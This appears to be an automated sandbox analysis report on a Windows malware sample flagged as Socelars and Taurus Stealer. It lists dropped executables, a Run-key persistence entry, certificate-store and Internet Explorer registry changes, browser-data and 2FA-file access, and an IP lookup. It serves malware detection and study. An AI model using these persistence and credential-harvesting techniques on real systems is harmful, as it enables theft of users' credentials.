Analysis Overview
SHA256
45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
Threat Level: Known bad
The file 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c was found to be: Known bad.
Malicious Activity Summary
Socelars Payload
Socelars
Taurus Stealer
Taurus Stealer Payload
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Accesses 2FA software files, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Runs ping.exe
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-06 13:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-06 13:12
Reported
2022-02-06 13:15
Platform
win7-en-20211208
Max time kernel
153s
Max time network
143s
Command Line
Signatures
Socelars
Socelars Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Taurus Stealer
Taurus Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701611bf631bd801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000002f648492c95554adef85f7a268ff7ba0afadfd014b35473b4a2a082fd474ed31000000000e80000000020000200000003d3c5b50ab37e6fc218c44ef094c6dc5d15d44b5f132094dc247de5dc902b06e9000000041ab3b2f1ce11c920dc78781a948b03382da5c22963870c515eea5cf0230179f5369bf5fabb0cdfd1079a6c5a6284e58fff3f10cd7663bbcf75edee03fb844750e578ed99f11d82c01863828125626936795995a5536f4b8c3b9502f488717c4e8bd1f8f2a5af1ef04bacc2c67cd16650f4d97c43d8aeea628e10bc8929384acc5afbade733e8c09065eb8130f74648240000000f2d07edb5ec720b4b510662cf7ff09369d7f7d48ff81eaa199ce3dce319fa50817c0bd1ab95e40cb2e0ecf7cd0676d69f3a1531a413219de6399ef909bb5cdbc | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "350921742" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D9281271-8756-11EC-A514-46595837F587} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000001a4e9f3712eb5de889121cd3fffd5cded3ca6f3942336b235f9f9a9bd2e6fca7000000000e80000000020000200000000cb3722f65383d4e8feddd84bc0edba9fe078e93b7b05d788aa08fda438a5cad20000000decaf1376415456119728aa1127d17990c580927efc25e5a2f9fe33c1ce3746540000000f264937b1c573bbcda57973a59d156421c2361a24fb562175be3d552a2e07c5fdd76f701c9edc622adced6f5bec400a287d6963be8d16d635b1652edbf88bc04 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D925B111-8756-11EC-A514-46595837F587} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
